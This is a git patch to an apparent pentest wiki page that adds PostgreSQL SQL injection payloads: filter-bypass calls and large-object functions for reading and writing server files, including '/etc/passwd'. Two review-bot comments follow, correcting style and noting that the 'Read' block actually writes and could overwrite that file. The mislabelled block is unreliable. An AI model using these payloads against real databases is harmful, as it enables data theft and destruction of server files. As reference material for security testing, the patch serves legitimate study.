From 57c6c16ef723de98dec94d63b3d21f7a39f55655 Mon Sep 17 00:00:00 2001 From: owalid Date: Tue, 30 Jan 2024 13:20:06 +0100 Subject: [PATCH] Update: sqlinjection part with postgresql payload (#20) * doc: update sqlinjection part with postgresql payload * clean --- wiki/Web.md | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) diff --git a/wiki/Web.md b/wiki/Web.md index 4fdd19a..e695db0 100644 --- a/wiki/Web.md +++ b/wiki/Web.md @@ -121,6 +121,9 @@ username[$eq]=admin&password[$eq]=admin > SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. > It generally allows an attacker to view data that they are not normally able to retrieve. - [Source](https://portswigger.net/web-security/sql-injection) + +Interesting [cheat sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet) of Port Swigger. + ## Manual ### Common pattern ``` @@ -152,6 +155,25 @@ admin", "") ON DUPLICATE KEY UPDATE password="newpasswd"; " ; SELECT * FROM users ``` +### Interesting postgres function + +#### Filter bypass +``` +query_to_xml('SELECT * FROM users', true, false, '') +ts_stat('SELECT * FROM users')::text +``` + +#### Arbitrary read / write +``` +# Read +lo_export(31337, '/etc/passwd') +lo_get(31337) + +# Write +lo_from_bytea(31338, decode('bG9saXBvcAo=', 'base64')) +lo_export(31338, '/tmp/lolipop') +``` + ## SQLmap > SQLmap is a tool that automates the process of detecting and exploiting SQL injection.
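Review bot: in the first hunk the added line "Interesting [cheat sheet](...) of Port Swigger." misspells the vendor name and reads awkwardly: the company writes it as one word, PortSwigger, and "of" should be "from". Suggest `Interesting [cheat sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet) from PortSwigger.`; since the quoted Source link directly above already points at portswigger.net, the new line can also sit right under that attribution without the extra blank line before it.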
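Review bot: the `# Read` block under "Arbitrary read / write" in the second hunk is mislabelled: `lo_export(31337, '/etc/passwd')` writes the contents of large object 31337 to the server-side path `/etc/passwd` (a write, and a destructive one if it succeeds), so the following `lo_get(31337)` only returns whatever was already in that object; reading a file into a large object is the inverse direction, which the hunk does not show, so either relabel the block as write-only or fix the direction before merging. The section should also document that the server-side large-object file functions are restricted to superusers unless EXECUTE has been granted explicitly, which is the defender-side mitigation (the application role must not be a superuser). Minor style points in the same hunk: the heading "Interesting postgres function" should be "Interesting PostgreSQL functions" (proper name, plural, since two functions are listed), and comments inside SQL snippets should use `--` rather than `#` so the lines paste cleanly into a client.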